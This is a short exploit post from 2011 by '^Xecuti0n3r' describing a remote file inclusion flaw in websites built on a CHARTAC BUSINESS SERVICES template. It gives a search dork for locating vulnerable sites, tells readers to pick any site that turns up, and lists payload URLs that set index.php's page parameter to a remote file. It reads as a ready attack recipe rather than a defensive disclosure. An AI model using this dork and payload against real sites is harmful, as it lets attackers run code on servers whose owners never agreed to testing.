#(+)Exploit Title: CHARTAC BUSINESS SERVICES Remote File Inclusion Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date : 22.04.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecuti0n3r()yahoo.com #(+) dork : intext:"CHARTAC. All rights reserved." #(+) Category : Web Apps [RFi] ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext:"CHARTAC. All rights reserved." in search engine *Remote File Inclusion* # [+]http://site.com/v2/index.php?page=http://google.com # [+]http://site.com/v2/index.php?page=[RFi] # [+]http://127.0.0.1/v2/index.php?page=[RFi] ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0n3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r ########################################################################